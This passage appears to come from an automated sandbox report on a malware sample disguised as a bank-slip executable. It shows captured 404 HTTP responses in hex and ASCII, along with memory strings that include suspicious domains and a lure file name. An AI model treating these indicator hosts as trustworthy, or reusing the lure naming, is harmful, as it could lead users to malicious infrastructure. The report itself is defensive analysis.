6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:14 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:17 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:37 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:39 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:42 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:44 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:08:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxe%2F10JfOoGGwnXQ19PXDAGVUEVm5cBOD6Ls3e%2BooDz2AQt72o6MN%2F1ob2m4tZMrp2ghE%2FEMzQ0yaRW5IhawKz5vZg2b5iZzbi1g7JXuKbQhEDw363ehQl8s%2BjX2SBbRLaz9%2FgslMmY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d67a76f797e6b7c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:08:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMM6sQvfXcj%2B9BmkKTSFdZ7yx3VdOAg1RQLOrqQGmsBJujpvvq6UFreUwNkeEpDGdP29RLJIgLiC%2FZQNbTdCG1KQmmKCU%2F2wKkeawU27BN1TvHp8BDrCIUVt9fSiW%2BCCudcAzrT%2Bwi0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d67a77f7fb12e66-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1322&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=750&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:08:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FL46wwhSTWrH3QNUJLXHXLbAU5CvzW9KthIEa9MWQ0GE9JC6dqbO70UXYkVseSAa5KGUZsYPgtIADoRZtpL9gZmNzv18ZaIDm%2FG3xu5pgIpbTYMbZs5zXSeols4yIo4PFD2l09nPVI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d67a7932bee4870-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10832&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.000000000500A000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.000000000612A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.0000000004CE6000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000005E06000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://meanttobebroken.org/9g6s/?_XPD90E=l/X
                Source: PO1268931024 - Bank Slip.exeString found in binary or memory: http://tempuri.org/DatabaseWalletDataSet.xsd
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
